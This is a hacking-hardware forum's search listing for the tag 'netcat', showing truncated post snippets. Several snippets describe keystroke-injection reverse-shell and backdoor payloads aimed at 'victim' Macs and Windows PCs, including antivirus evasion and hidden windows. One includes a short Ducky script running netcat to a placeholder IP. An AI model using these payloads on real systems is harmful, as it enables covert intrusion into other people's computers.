Jump to content

Search the Community

Showing results for tags 'netcat'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 10 results

  1. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Sing
  2. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing
  3. I successfully implemented the root payload on Mac and PC I have a linux box waiting that connected successfully as root on both devices My question is, how do I handle multiple machines? Give each one a different port? That seems obnoxious to have to port forward each one so I know that isnt right Is there a "session manager" or a way for a webserver to catch those connection requests?
  4. Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/bas
  5. Hello everyone Dtpk here and well I did a thing using Netcat and the usb rubber ducky to make a invisible reverse shell in under a few seconds I didn't time it this time but if I had to guess its about 8 to 9 seconds maybe a little faster first it navigates to userprofile folder then it downloads unzip.exe from either you own drop box or mine if you chose not to change the code then it downloads netcat from its site extracts it from command line using unzip.exe then it makes a batch file to invoke netcat to open a port on 190 then we use vbs script to launch the batch file invisibly. Also I ha
  6. This Payload is tested in the latest version of OS X El Capitan. It Simply opens Terminal and starts a reverse NetCat to your computer, when it connects it minimizes the terminal window You might want to mess around with the delay DELAY 1000 GUI SPACE DELAY 200 STRING TERMINAL DELAY 300 STRING nc -l IPADRESS 8888 DELAY 100 GUI M Temperary NC backdoor.txt
  7. So, I want to make a safe chatroom that uses the terminal or command line on my kali linux pc for multiple participants that is unspyable with something like SSH connection. At the moment I use netcat (nc -l <porttolisten>) but other users cant communicate with each other only with the server. Any suggestions??
  8. I need someone with some bashfu. I would like a bash script that can execute a nc -l -p 1025 command, then redirect the stdout to 1 mkfifo and the stdin to a 2nd mkfifo. anyone know how to do that? tyvm
  9. HI, I have just got my rubber ducky and playing around with the payload script "Payload netcat FTP download and reverse shell" I don't know where to find the netcat exe for windows in order to place in the ftp site for download with the script. I have found one that is installed with NMap but when I try and run it from the windows command prompt after a successful download it fails stating that it is a 16 bit application Can anyone advise on this please Thanks
  10. Recently came across a bash only web server (using netcat) at http://paulbuchheit.blogspot.ro/2007/04/webserver-in-bash.html I fiddled a little with it and turned it into a decent web server, with server logs and all. (no IP captured, just the query string and timestamp) It supports file downloads, it servers static html, PHP, Python and binary files with arguments (GET). It checks for 404 errors and it keeps a server log. Fun facts: 5 times slower then nginx (for a single user) executes binary faster then displays static content php is the slowest :) php files need to be .php python files
  • Create New...